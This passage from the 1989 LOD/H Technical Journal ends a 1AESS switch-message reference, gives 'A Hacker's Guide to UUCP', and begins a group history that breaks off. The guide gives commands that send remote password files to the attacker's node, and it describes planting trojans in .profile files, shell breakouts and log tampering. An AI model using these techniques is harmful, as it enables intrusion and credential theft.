|
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
|
|||
|
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
|
|||
|
REPT:ADS PROCEDURAL ERROR You fucked up
|
|||
|
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
|
|||
|
REPT:PROG CONT OFF-NORMAL System programs that are off or on
|
|||
|
REPT:RC CENSUS Hourly report on recent changes
|
|||
|
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
|
|||
|
|
|||
|
** RECENT CHANGE **
|
|||
|
RC18 RC message response
|
|||
|
|
|||
|
** REMOVE **
|
|||
|
RMV Removed from service
|
|||
|
|
|||
|
** RESTORE **
|
|||
|
RST Restored to service status
|
|||
|
|
|||
|
** RINGING AND TONE PLANT **
|
|||
|
RT04 Status of monitors
|
|||
|
|
|||
|
** SOFTWARE AUDIT **
|
|||
|
SA01 Call store memory audit results
|
|||
|
SA03 Call store memory audit results
|
|||
|
|
|||
|
** SIGNAL IRREGULARITY **
|
|||
|
SIG IRR Blue box detection
|
|||
|
SIG IRR INHIBITED Detector off
|
|||
|
SIG IRR TRAF Half hour report of traffic data
|
|||
|
|
|||
|
** TRAFFIC CONDITION **
|
|||
|
TC15 Reports overall traffic condition
|
|||
|
TL02 Reason test position test was denied
|
|||
|
TL03 Same as above
|
|||
|
|
|||
|
** TRUNK NETWORK **
|
|||
|
TN01 Trunk diagnostic found trouble
|
|||
|
TN02 Dial tone delay alarm failure
|
|||
|
TN04 Trunk diag request from test panel
|
|||
|
TN05 Trunk test procedural report or denials
|
|||
|
TN06 Trunk state change
|
|||
|
TN07 Response to a trunk type and status request
|
|||
|
TN08 Failed incoming or outgoing call
|
|||
|
TN09 Network relay failures
|
|||
|
TN10 Response to TRK-LIST input, usually a request from test position
|
|||
|
TN11 Hourly, status of trunk undergoing tests
|
|||
|
TN16 Daily summary of precut trunk groups
|
|||
|
|
|||
|
** TRAFFIC OVERLOAD CONDITION **
|
|||
|
TOC01 Serious traffic condition
|
|||
|
TOC02 Reports status of less serious overload conditions
|
|||
|
|
|||
|
** TRANSLATION ** (shows class of service, calling features etc.)
|
|||
|
TR01 Translation information, response to VFY-DN
|
|||
|
TR03 Translation information, response to VFY-LEN
|
|||
|
TR75 Translation information, response to VF:DNSVY
|
|||
|
** **
|
|||
|
TW02 Dump of octal contents of memory
|
|||
|
|
|||
|
|
|||
|
|
|||
|
1AESS COMMON INPUT MESSAGES
|
|||
|
-------------------------------------
|
|||
|
|
|||
|
Messages always terminate with ". ctrl d " x=number or trunk network #
|
|||
|
|
|||
|
|
|||
|
MSG. DESCRIPTION
|
|||
|
------------------------------------------------------------------------
|
|||
|
NET-LINE-xxxxxxx0000 Trace of path through switch
|
|||
|
NET-TNN-xxxxxx Same as above for trunk trace
|
|||
|
T-DN-MBxxxxxxx Makes a # busy
|
|||
|
TR-DEACTT-26xxxxxxx Deactivates call forwarding
|
|||
|
VFY-DNxxxxxxx Displays class of service, calling features etc.
|
|||
|
VFY-LENxxxxxxxx Same as above for OE
|
|||
|
VFY-LIST-09 xxxxxxx Displays speed calling 8 list
|
|||
|
|
|||
|
|
|||
|
************************************************************************
|
|||
|
|
|||
|
There are many things I didn't cover in this article and many of the
|
|||
|
things I covered, I did so very briefly. My intention was to write an article
|
|||
|
that explains the big picture, how everything fits together. I hope I helped.
|
|||
|
|
|||
|
Special thanks to all the stupid people, for without them some of us
|
|||
|
wouldn't be so smart and might have to work for a living. Also all the usual
|
|||
|
Bell Labs, AT&T bla bla bla etc. etc.
|
|||
|
|
|||
|
I can usually be reached on any respectable board, ha!
|
|||
|
|
|||
|
|
|||
|
Agent Steal Inner (C)ircle 1989
|
|||
|
|
|||
|
!!!!!
|
|||
|
|
|||
|
!!!!! FREE KEVIN MITNICK !!!!!
|
|||
|
|
|||
|
!!!!!
|
|||
|
|
|||
|
[End Of Article]
|
|||
|
|
|||
|
The LOD/H Technical Journal, Issue #4: File 05 of 10
|
|||
|
|
|||
|
|
|||
|
=====================================================
|
|||
|
|| ||
|
|||
|
|| A Hacker's Guide to UUCP ||
|
|||
|
|| ||
|
|||
|
|| by ||
|
|||
|
|| ||
|
|||
|
|| The Mentor ||
|
|||
|
|| ||
|
|||
|
|| Legion of Doom/Hackers ||
|
|||
|
|| ||
|
|||
|
|| 08/04/89 ||
|
|||
|
|| ||
|
|||
|
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
Scope
|
|||
|
DDDDD
|
|||
|
|
|||
|
Part I of this file is intended for the casual hacker- someone
|
|||
|
familiar with UNIX commands, but who hasn't had extended experience
|
|||
|
with the UUCP network. Part II will be intended for the advanced
|
|||
|
hacker who has the confidence and knowledge to go out and modify
|
|||
|
a UNIX network- the logs, the paths, the permissions, etc...
|
|||
|
|
|||
|
|
|||
|
Introduction
|
|||
|
DDDDDDDDDDDD
|
|||
|
|
|||
|
Like it or not, UNIX is the most popular operating system in the
|
|||
|
world. As a hacker, you are likely to run into several hundred
|
|||
|
UNIX machines over the course of your hacking career. Knowing how
|
|||
|
to move around and use the UNIX environment should be considered
|
|||
|
absolutely essential, especially since UNIX is the operating system
|
|||
|
of choice among phone company computers.
|
|||
|
|
|||
|
This article is not an attempt to teach you how to use UNIX.
|
|||
|
If you don't know what a '$ls -x > dir' does, you need to put this
|
|||
|
article in your archives, get a good basic file on UNIX (or buy a
|
|||
|
book on it- there are several good ones out ((see the Bibliography
|
|||
|
at the end of this file for suggestions))), read it, and then play
|
|||
|
around some in a UNIX machine. Please! If you have managed to
|
|||
|
stumble into a Bell system, do *not* use it as a machine to learn
|
|||
|
UNIX on! You *will* get noticed by security, and this will lead
|
|||
|
not only to the security being tightened, but may well lead to Bell
|
|||
|
Security going through your underwear drawer.
|
|||
|
|
|||
|
The information in this article is mainly concerning AT&T System
|
|||
|
V UNIX. I have included BSD 4.3 & Xenix information also in cases
|
|||
|
that I was able to determine alternate procedures. All information
|
|||
|
has been thoroughly tested and researched on as many machines as
|
|||
|
possible. Standard disclaimer, your system may be slightly
|
|||
|
different.
|
|||
|
|
|||
|
Glossary & Usage
|
|||
|
DDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
BNU - Basic Networking Utilities. System V.3's uucp package.
|
|||
|
daemon - A program running in the background.
|
|||
|
LAN - Local Area Network.
|
|||
|
network - A group of machines set up to exchange information and/or
|
|||
|
resources.
|
|||
|
node - A terminating machine on a network.
|
|||
|
UUCP - When capitalized, refers to the UNIX networking utilities
|
|||
|
package.
|
|||
|
uucp - In lower case, refers to the program Unix-to-Unix-CoPy.
|
|||
|
|
|||
|
I. General Information
|
|||
|
DDDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
A. What is UUCP?
|
|||
|
|
|||
|
UUCP is a networking facility for the UNIX operating system.
|
|||
|
It is made up of a number of different programs that allow UNIX
|
|||
|
machines to talk to each other. Using UUCP, you can access a
|
|||
|
remote machine to copy files, execute commands, use resources, or
|
|||
|
send mail. You can dial out to other non-UNIX computers, and you
|
|||
|
can access public mail/news networks such as USENET.
|
|||
|
|
|||
|
B. History of UUCP
|
|||
|
|
|||
|
The first UUCP system was built in 1976 by Mike Lest at AT&T
|
|||
|
Bell Labs. This system became so popular that a second version was
|
|||
|
developed by Lesk, David Nowitz, and Greg Chesson. Version 2 UUCP
|
|||
|
was distributed with UNIX Version 7.
|
|||
|
|
|||
|
With System V Release 3, a new version of UUCP that was
|
|||
|
developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E.
|
|||
|
Redman. This version is known as either HoneyDanBer UUCP (from the
|
|||
|
last names of the developers), or more conventionally as Basic
|
|||
|
Networking Utilities (BNU). I will stick with BNU, as it is easier
|
|||
|
to type. BNU is backward compatible with Version 2, so there is
|
|||
|
no problem communicating between the two.
|
|||
|
|
|||
|
BSD 4.3's UUCP release incorporates some of the BNU features,
|
|||
|
but retains more similarity to Version 2 UUCP.
|
|||
|
|
|||
|
If you are unsure about which version of UUCP is on the system
|
|||
|
that you are in, do a directory of /usr/lib/uucp and look at the
|
|||
|
files. If you have a file called L.sys, you are in a Version 2
|
|||
|
system. If there is a file called Systems, then it's BNU. See
|
|||
|
Table 1 for a fairly complete listing of what system runs what UUCP
|
|||
|
version.
|
|||
|
|
|||
|
|
|||
|
Table 1*
|
|||
|
DDDDDDD
|
|||
|
Manufacturer Model UNIX/UUCP Version
|
|||
|
|
|||
|
_____________________________________________________________
|
|||
|
| | | |
|
|||
|
| Apollo | 3000 Series (Domain) | BSD 4.2/Version 2|
|
|||
|
| Altos | All models | Xenix/Version 2 |
|
|||
|
| AT&T | 3B1 (UNIX PC) | System V.2/Vers.2|
|
|||
|
| AT&T | 3B2 | System V.3/BNU |
|
|||
|
| AT&T | 3B15 | System V.3/BNU |
|
|||
|
| Convergent | Miniframe (CTIX) | System V.2/Vers.2|
|
|||
|
| Technologies | Mightframe (CTIX) | System V.3/BNU |
|
|||
|
| DEC | MicroVAX | Ultrix/Vers. 2 + |
|
|||
|
| DEC | VAX | BSD 4.3/Vers. 2 +|
|
|||
|
| Encore | Multimax | System V.3/BNU |
|
|||
|
| IBM | PC-RT (AIX) | System V.2/Vers.2|
|
|||
|
| Masscomp | MC-5000 Series | System V.3/BNU |
|
|||
|
| Microport | PC/AT | System V.2/Vers.2|
|
|||
|
| NCR | Tower 32/16 | System V.2/Vers.2|
|
|||
|
| Prime | EXL Series | System V.2/Vers.2|
|
|||
|
| Pyramid | 90x | BSD 4.2/Version 2|
|
|||
|
| SCO/Xenix | PC/XT | System V.2/Vers.2|
|
|||
|
| Unisys | 5000 & 7000 Series | System V.2/Vers.2|
|
|||
|
| | | |
|
|||
|
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
|||
|
* This table is slightly outdated. Some of the systems may have
|
|||
|
upgraded since this article was written.
|
|||
|
|
|||
|
|
|||
|
II. UUCP Communications
|
|||
|
DDDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
A. Overview of UUCP User Programs
|
|||
|
|
|||
|
There are a number of programs that are used by a UUCP
|
|||
|
communication network. Some are standard UNIX programs, others are
|
|||
|
exclusively part of the UUCP package.
|
|||
|
.................................................................
|
|||
|
|
|||
|
These three are standard UNIX commands:
|
|||
|
|
|||
|
mail- UNIX's mail facility can be used to send messages
|
|||
|
to other systems on a UUCP network.
|
|||
|
cu- Connects you to a remote machine and allows you to
|
|||
|
be logged in simultaneously to both machines. Also
|
|||
|
allows you execute commands on either machine
|
|||
|
without dropping the link.
|
|||
|
tip- (BSD) same as cu.
|
|||
|
|
|||
|
+++
|
|||
|
|
|||
|
There are five main programs within UUCP:
|
|||
|
|
|||
|
uucp- Does all the setup for a remote file transfer.
|
|||
|
uucp creates files that describe the file transfer
|
|||
|
(called 'work' files), then calls the uucico daemon
|
|||
|
to do the actual work.
|
|||
|
uux- Used to execute commands on a remote machine. uux
|
|||
|
performs similar to uucp, except that commands are
|
|||
|
processed instead of files.
|
|||
|
uuname- Used to list the names of other systems that are
|
|||
|
connected to your network.
|
|||
|
uulog- Displays the uucp log for the specified machine.
|
|||
|
I'll be showing how to cover your uucp tracks from
|
|||
|
this later in the article.
|
|||
|
uustat- Gets the status of uux requests. Also lets you
|
|||
|
manipulate the contents of a UUCP queue.
|
|||
|
|
|||
|
+++
|
|||
|
|
|||
|
System V also has two additional programs:
|
|||
|
|
|||
|
uuto- Allows you to send files to another user similar
|
|||
|
to the UNIX mail command.
|
|||
|
uupick- Allows you to read files sent to you with uuto.
|
|||
|
|
|||
|
+++
|
|||
|
|
|||
|
BSD 4.3 has two additional programs:
|
|||
|
|
|||
|
uuq- Lets you view & manipulate UUCP jobs that are
|
|||
|
waiting to be processed, similar to System V's
|
|||
|
uupick program.
|
|||
|
uusend- Lets you forward files through a string of systems.
|
|||
|
..................................................................
|
|||
|
|
|||
|
III. Using the Programs
|
|||
|
DDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
A. uuname
|
|||
|
|
|||
|
This one is easy & friendly. All you do is type '$uuname'.
|
|||
|
It will spit out a list of all systems on your network. If you
|
|||
|
aren't sure about the name of your local system, invoke uuname with
|
|||
|
the -l option. ($uuname -l).
|
|||
|
|
|||
|
B. mail
|
|||
|
|
|||
|
I'm not going to say to much about mail, as it isn't a program
|
|||
|
that you will use much as a hacker except possibly to break out of
|
|||
|
a shell. Sending mail to other people is not a good way to stay
|
|||
|
hidden, as all mail transfer to remote systems is logged (no, they
|
|||
|
may not read the mail, but they're likely to notice that the
|
|||
|
unassigned ADMIN account is suddenly getting mail from all over the
|
|||
|
world...) These logs can be modified, however. This will
|
|||
|
be covered in Part II.
|
|||
|
|
|||
|
Briefly, mail is invoked with the command 'mail username' (or
|
|||
|
mailx under some systems). If you wish to send mail to user john
|
|||
|
on the system you're on, you would type:
|
|||
|
|
|||
|
mail john
|
|||
|
Dear John-
|
|||
|
This is mail. Enjoy it.
|
|||
|
^D (usage note, this means control-D)
|
|||
|
|
|||
|
To send mail to a user on a remote system, or a string of
|
|||
|
systems, you would use the ! key to indicate a remote system name.
|
|||
|
If you were on node Alpha and wanted to send mail to john on node
|
|||
|
Beta, you would address your mail to 'mail Beta!john'. If you
|
|||
|
wanted to send mail to a user on system that's not connected to
|
|||
|
yours, but *is* connected to a machine you are connected to, you
|
|||
|
would string together the system names, separated by a !. For
|
|||
|
example, if node Saturn was connected to Beta, but not to Alpha,
|
|||
|
you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'.
|
|||
|
|
|||
|
Please note- If you are running the C-Shell or Bourne Shell,
|
|||
|
you will have to prefix the ! with a X. i.e. 'mail BetaX!SaturnX!susan'.
|
|||
|
Also, the mail header displays the system name, return path, and account
|
|||
|
name that you send mail from, so don't try to anonymously mail someone
|
|||
|
a message- it won't work.
|
|||
|
|
|||
|
Another quick feature (this is under the 'basic unix
|
|||
|
knowledge' category), if you want to mail a file named 'message'
|
|||
|
to someone, you'd type the following - '$mail Beta!Saturn!susan <
|
|||
|
message'.
|
|||
|
|
|||
|
Finally, as mentioned above, it may be possible to break out
|
|||
|
of a restricted shell within mail. Simply send mail to yourself,
|
|||
|
then when you enter mail to read the message, type !sh to exit from
|
|||
|
mail into shell. This will often blow off the restricted shell.
|
|||
|
|
|||
|
|
|||
|
C. File Transfer
|
|||
|
|
|||
|
One of the first things that you will want to do when you
|
|||
|
discover that you're on a network (uuname, remember?) is to grab
|
|||
|
a copy of the /etc/password file from the systems on the net then
|
|||
|
run Shooting Shark's password hacking program from TJ Issue #2.
|
|||
|
Even if you have no use for it now, save it & label it, you never
|
|||
|
know when you might need to get into that system. Besides, when
|
|||
|
printed, they make fun & interesting wallpaper.
|
|||
|
|
|||
|
Unfortunately, the /etc/ directory will sometimes have access
|
|||
|
restricted. You can get around this by copying the /etc/password
|
|||
|
file to the /usr/spool/uucppublic directory using the uux command
|
|||
|
(see below). If the uux program has restrictions on in, then you
|
|||
|
may have to actually hack into the remote system using the rlogin
|
|||
|
command. Be persistent.
|
|||
|
|
|||
|
UUCP is also useful in that it allows you to send a file from
|
|||
|
your system to a remote system. Got a nice little trojan you need
|
|||
|
to insert on their system? Use UUCP to drop it into the /bin/
|
|||
|
directory. Or if they protected the /bin/ directory (likely, if
|
|||
|
they have half a brain), they might have forgotten to protect all
|
|||
|
of the users private directories (i.e. /usr/mike or /usr/susan or
|
|||
|
sometimes even /usr/admin). UUCP a copy of a .profile file to your
|
|||
|
system, insert your own stuff in it, then UUCP it back to its
|
|||
|
original directory where the user will access it the next time he
|
|||
|
logs in. People rarely $cat their .profile file, so you can
|
|||
|
usually get away with murder in them.
|
|||
|
|
|||
|
While uucp has some limitations, it has the advantage of being
|
|||
|
present on every UUCP system in the world. If you're on a System
|
|||
|
V, you will probably use uuto & uupick much more frequently, as
|
|||
|
it's easier to do subtle hacks with them. But if uucp is all you
|
|||
|
have, remember, you're a hacker. Show some ingenuity. The syntax
|
|||
|
of uucp when sending a file is:
|
|||
|
|
|||
|
$uucp [options] <local source> <remote destination>
|
|||
|
|
|||
|
For example, you have a program sitting in your working
|
|||
|
directory on node Alpha called 'stuff', and you want to plop it
|
|||
|
into the /usr/spool/uucppublic/mike/ directory of node Beta. The
|
|||
|
command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'.
|
|||
|
(Don't forget to add a slash in front of the exclamation point if
|
|||
|
you're in C-Shell or Bourne!) A good thing to know that will save
|
|||
|
you some typing is that the /usr/spool/uucppublic/ directory can
|
|||
|
be abbreviated as D/ (in KSH only), so that the above command could look
|
|||
|
like '$uucp stuff Beta!D/mike/'. You can also specify a path other than
|
|||
|
D/. If you wish to drop your 'new & improved' version of the
|
|||
|
/etc/password file into the /etc/ directory, you could do a '$uucp
|
|||
|
password Beta!/etc/'. Just don't be surprised if it gets bounced
|
|||
|
with a message similar to the following:
|
|||
|
|
|||
|
From uucp Sat Dec 24 23:13:15 1988
|
|||
|
Received: by Beta.UUCP (2.15/3.3)
|
|||
|
id AA25032; Sat Dec 24 23:13:15 edt
|
|||
|
Date: Sat Dec 24 23:13:15 edt
|
|||
|
From: uucp
|
|||
|
Apparently to: hacker
|
|||
|
Status: R
|
|||
|
|
|||
|
file /etc/password, system Beta
|
|||
|
remote access to path/file denied
|
|||
|
|
|||
|
Another hacker-friendly feature of UUCP is the ability to copy
|
|||
|
something into a remote user's login directory by entering a D
|
|||
|
character before the username. For example, to dump a modified
|
|||
|
.profile file into a user on Beta named alex, you would do the
|
|||
|
following:
|
|||
|
|
|||
|
|
|||
|
'$uucp .profile Beta!Dalex'
|
|||
|
|
|||
|
The syntax for uucp when receiving a remote file is:
|
|||
|
|
|||
|
$uucp [options] <remote path> <local directory>
|
|||
|
|
|||
|
For example, you wish to grab Beta's password file and put it in
|
|||
|
a subdirectory called tmp in the account 'hacker' on node Alpha.
|
|||
|
The command would be:
|
|||
|
|
|||
|
'$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'.
|
|||
|
|
|||
|
The same things concerning use of tildes (D) demonstrated in
|
|||
|
sending files applies when receiving them. The following table
|
|||
|
contains valid options to the uucp command.
|
|||
|
|
|||
|
|
|||
|
Table 2
|
|||
|
DDDDDDD
|
|||
|
_________________________________________________
|
|||
|
| |
|
|||
|
| -C Copy the local source file to the spool |
|
|||
|
| directory before attempting the trans- |
|
|||
|
| fer. |
|
|||
|
| |
|
|||
|
| -f If the directory doesn't exist, abort the |
|
|||
|
| transfer. Normally uucp will create any |
|
|||
|
| non-existent directories, which is bad |
|
|||
|
| technique if you're a good hacker... |
|
|||
|
| |
|
|||
|
| -j Display the UUCP job request number. This |
|
|||
|
| is useful if you're going to use uustat |
|
|||
|
| to manipulate & reroute UUCP requests in |
|
|||
|
| the queue. |
|
|||
|
| |
|
|||
|
| -m Notify sender by mail when copy is done. |
|
|||
|
| Potentially hazardous, as incoming mail |
|
|||
|
| is logged. Later on I'll show how to |
|
|||
|
| modify that log... |
|
|||
|
| |
|
|||
|
| -n<username> Notify the user specified on |
|
|||
|
| the remote system when the xfer is done. |
|
|||
|
| I assume everyone sees how foolish this |
|
|||
|
| would be, right? |
|
|||
|
| |
|
|||
|
| -r Queue the job, but do not contact remote |
|
|||
|
| system immediately. Can't see any pros |
|
|||
|
| or cons in using this one... |
|
|||
|
| |
|
|||
|
| -s<filename> Pipe the UUCP status messages |
|
|||
|
| to filename. Useful if you wish to log |
|
|||
|
| off & then check the progress later. |
|
|||
|
| |
|
|||
|
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
D. Executing Remote Commands
|
|||
|
|
|||
|
The uux program allows users to execute a program on another
|
|||
|
system on the network. While in theory this is the most useful
|
|||
|
command a hacker can use, in practice it is usually heavily
|
|||
|
restricted- any system administrator with half a brain realizes
|
|||
|
that letting people execute any command they like from across the
|
|||
|
country is not the way to maintain system integrity.
|
|||
|
|
|||
|
There are, however, some useful things that can be done with
|
|||
|
uux even if the sysadmin has protected the things that *he* thinks
|
|||
|
are dangerous (remember, he's not a hacker, you are. You are
|
|||
|
smarter, more persistent, and much cleverer than he is. He doesn't
|
|||
|
like coming to work every day, can't wait to leave, and will do the
|
|||
|
minimum possible to get by. You're different. You're dedicated &
|
|||
|
tricky. You *like* what you're doing. If you don't, get the hell
|
|||
|
out & let others who do take over. End of the pep talk.)
|
|||
|
|
|||
|
The format for the uux command is:
|
|||
|
|
|||
|
$uux [options] command-string.
|
|||
|
|
|||
|
See Table 3 below for a list of options.
|
|||
|
|
|||
|
Ok, ideal case. The System manager of Beta is an idiot who
|
|||
|
has left all possible commands open, and the uucico daemon has root
|
|||
|
privs. Let's say you want to alter the protection of the password
|
|||
|
file, copy it into the D/ (public, remember?) directory, then copy
|
|||
|
it over to your system. The sequence of commands would be:
|
|||
|
|
|||
|
$uux Beta!chmod 777 /etc/password
|
|||
|
$uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt
|
|||
|
$uucp Beta!D/info.txt /usr/hacker/
|
|||
|
|
|||
|
The first line would modify the protection where anyone could
|
|||
|
get to it, the second line would copy it into the D/ directory, and
|
|||
|
the third line would send it along to you.
|
|||
|
|
|||
|
Unfortunately, most commands are disabled (useful ones like
|
|||
|
chmod and cat and ls, at least.) But sometimes you can get around
|
|||
|
that. For instance, often you might not be able to ls or cp the
|
|||
|
password file. But very rarely will mail be disabled. So if you
|
|||
|
wanted a copy of the password file, you have them mail you one:
|
|||
|
|
|||
|
$uux Beta!mail Alpha!hacker < /etc/password
|
|||
|
|
|||
|
Later in the UUCP Administration section, I'll explain how to
|
|||
|
modify the remote system so any command you want is executable.
|
|||
|
|
|||
|
When you execute a remote command, UUCP will automatically
|
|||
|
send you mail telling you how it went. It's a good idea to check
|
|||
|
the logs and see if there's anything you need to remove to cover
|
|||
|
your presence (this subject will be covered in Part II).
|
|||
|
|
|||
|
If you are executing a command that is going to need data from
|
|||
|
a file, you specify that the file is on your local system by
|
|||
|
prefacing it with a X!. I can't think of many reasons to use this,
|
|||
|
but perhaps you can. As an example, let's say you wanted to print
|
|||
|
a file in your directory called 'stuff' out on a remote laser
|
|||
|
printer (bad hacking practice, and difficult to retrieve.) Do this:
|
|||
|
|
|||
|
$uux Beta!lp -dlaser X!stuff
|
|||
|
|
|||
|
If the command you want to execute (whodo in this example) is
|
|||
|
forbidden, you will get a notification message similar to the
|
|||
|
following:
|
|||
|
|
|||
|
>From uucp Sat Dec 24 23:12:15 EDT 1988
|
|||
|
>From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta
|
|||
|
Status: R0
|
|||
|
uuxqt cmd (whodo) status (DENIED)
|
|||
|
|
|||
|
If you are going to need the standard output for a command,
|
|||
|
pipe it into D/. And any files or processes created by uux will
|
|||
|
belong to the user uucp, not to you.
|
|||
|
|
|||
|
Table 3
|
|||
|
DDDDDDD
|
|||
|
__________________________________________________________
|
|||
|
| |
|
|||
|
| -a<username> Notify user username when completed. |
|
|||
|
| |
|
|||
|
| -b Print the Standard Input when the exit status |
|
|||
|
| indicates an error. |
|
|||
|
| |
|
|||
|
| -c Do not copy files to the spool directory (I |
|
|||
|
| recommend this one...too big a chance of someone |
|
|||
|
| glancing in the spool dir. |
|
|||
|
| |
|
|||
|
| -g<char or num> Sets the priority of the transfer. |
|
|||
|
| The lower alphabetically or numerically that |
|
|||
|
| the char or num is, the faster the process will |
|
|||
|
| be executed. i.e. -ga or -g2 will go faster |
|
|||
|
| than -gr or -g8. |
|
|||
|
| |
|
|||
|
| -j Print the UUCP job number. Useful if you're |
|
|||
|
| going to be playing with the queue. |
|
|||
|
| |
|
|||
|
| -I (BSD Only) Make a link from the original file to |
|
|||
|
| the spool dir. I'm not sure what this is for. |
|
|||
|
| |
|
|||
|
| -L (BSD Only) Start up the uucico daemon. |
|
|||
|
| |
|
|||
|
| -n Don't notify by mail. Recommended if you don't |
|
|||
|
| have the authority or knowledge to modify the |
|
|||
|
| system mail logs. |
|
|||
|
| |
|
|||
|
| -p Use Standard Input |
|
|||
|
| |
|
|||
|
| -r Queue the job but don't start uucico. |
|
|||
|
| |
|
|||
|
| -s<filename> Send transfer status to file filename. |
|
|||
|
| |
|
|||
|
| -x<0..9> Set level of debugging information. |
|
|||
|
| |
|
|||
|
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
E. uustat & uulog
|
|||
|
|
|||
|
These two programs are used to track UUCP jobs and examine
|
|||
|
their status.
|
|||
|
|
|||
|
uustat prints out a one-line summary for each job, telling you
|
|||
|
if the job is finished or the job is queued. Older versions of
|
|||
|
uustat will have the job state as either JOB DELETED or JOB IS
|
|||
|
QUEUED. The output of uustat will look like the following:
|
|||
|
|
|||
|
$uustat
|
|||
|
|
|||
|
1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED
|
|||
|
1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED
|
|||
|
| | | | | |
|
|||
|
| | | | | |
|
|||
|
job # user node start-time status-time job-status
|
|||
|
|
|||
|
See Table 4 for a list of options for the uustat command.
|
|||
|
|
|||
|
uulog is a more thorough version of uustat, as it tracks the
|
|||
|
status messages logged by the system as your job proceeded through
|
|||
|
the system. See Table 5 for options of the uulog command.
|
|||
|
|
|||
|
Table 4*
|
|||
|
DDDDDDD
|
|||
|
_________________________________________________
|
|||
|
| |
|
|||
|
| -a report all queued jobs. |
|
|||
|
| |
|
|||
|
| -k<job#> kill job # job#. |
|
|||
|
| |
|
|||
|
| -m report if another system is accessible. |
|
|||
|
| |
|
|||
|
| -q report the number of jobs queued for |
|
|||
|
| all systems on the net. |
|
|||
|
| |
|
|||
|
| -s<system> report the status of jobs for |
|
|||
|
| the system named systemname. |
|
|||
|
| |
|
|||
|
| -u<username> report the status of jobs for |
|
|||
|
| user username. |
|
|||
|
| |
|
|||
|
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
|||
|
* There are several other options such as -o and
|
|||
|
-y that are system specific, and aren't really
|
|||
|
that useful to begin with.
|
|||
|
|
|||
|
|
|||
|
Table 5
|
|||
|
DDDDDDD
|
|||
|
______________________________
|
|||
|
| |
|
|||
|
| -s<system> same as uustat |
|
|||
|
| |
|
|||
|
| -u<userid> same as uustat |
|
|||
|
| |
|
|||
|
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
|
|||
|
|
|||
|
******************************************************************
|
|||
|
|
|||
|
This marks the end of Part I. If time permits a Part II will be in
|
|||
|
the next LOD/H Technical Journal.
|
|||
|
|
|||
|
(c) 1989 The Mentor
|
|||
|
Legion of Doom/Legion of Hackers
|
|||
|
|
|||
|
******************************************************************
|
|||
|
|
|||
|
|
|||
|
The LOD/H Technical Journal, Issue #4: File 06 of 10.
|
|||
|
|
|||
|
|
|||
|
The History of LOD/H
|
|||
|
Revision #3 May 1990
|
|||
|
written by Lex Luthor
|
|||
|
|
|||
|
|
|||
|
NOTES: I approximated all dates, as my records are not totally complete.
|
|||
|
If I left anyone out or put someone in that shouldn't be in, sorry I
|
|||
|
tried and did spend considerable time researching the dates and
|
|||
|
BBS files, the old LOD BBS software, etc. Revisions one and two were
|
|||
|
released to LOD/H members only. Some information may only be relevant
|
|||
|
to those who were around at the time.
|
|||
|
|
|||
|
|
|||
|
The primary purpose of this article is simply to present an accurate
|
|||
|
picture of events and people who have been associated with this group. The
|
|||
|
reputation of many groups and many people have been tainted by slanderous
|
|||
|
remarks made by uninformed law enforcement and justice department personnel,
|
|||
|
the media, and other hackers. I find this sad, but it's a fact of life that
|
|||
|
must be endured. All that can be done in this article is to attempt to present
|
|||
|
the facts as I see them. Due to the wild and unfounded accusations by said
|
|||
|
persons, today LOD is viewed more as malicious criminals than as for what it
|
|||
|
was viewed as in the past. That is, of a group of people who put themselves at
|
|||
|
risk to help inform others. Of course this is a prettier picture than most
|
|||
|
want to believe, and is slightly prettier than what it is in actuality, but
|
|||
|
the ideal is there. Whenever a group of individuals get together, you cannot
|
|||
|
forget that they are individuals. These individuals can and do make mistakes
|
|||
|
in judgement in some cases. But also, they have been and continue to be
|
|||
|
victimized by law enforcement and said others. Over the years I have collected
|
|||
|
tens of newspaper and magazine articles about "The LOD", myself, and others
|
|||
|
with not a one being perfectly accurate. You have heard it before: don't
|
|||
|
believe everything you read. That goes for this article also, although I have
|
|||
|
made an honest attempt at ensuring that it is truthful and accurate, as Ripley
|
|||
|
said: believe it, or not.
|
|||
|
|
|||
|
I have been "retired" for quite some time now. My definition of retired is
|
|||
|
simply that of keeping my activities to those of a strictly legitimate nature.
|
|||
|
It is quite funny yet pitiful to here people say, "once a crook always a
|
|||
|
crook" AND BELIEVE IT! That statement is a fallacy. Nearly everyone has done
|
|||
|
something wrong when they were young yet many grow up to become the so called
|
|||
|
normal, law abiding citizens that society says we should be. At this point in
|
|||
|
time and in the foreseeable future, the risks of exploring and learning about
|
|||
|
telephone and computer networks in a less than legitimate fashion outweigh the
|
|||
|
benefits. I think many of the older hackers have adopted this philosophy out
|
|||
|
of necessity. This decision is even easier after reflecting on the events of
|
|||
|
which I have seen during the course of my "career". Those events are primarily
|
|||
|
those of seeing people's rights being violated by law enforcement. Their
|
|||
|
privacy being forsaken by the media. I do not dispute however, that some
|
|||
|
hackers have done these same things to other hackers and other people. Neither
|
|||
|
side is right or fair so I suppose it is time to exit since it's getting too
|
|||
|
hot in the kitchen. I will remain however, in an advisory capacity to the
|
|||
|
Technical Journal and group for as long as they continue exist. If you are to
|
|||
|
believe the rumors, LOD has been dead many times, again untrue. The main
|
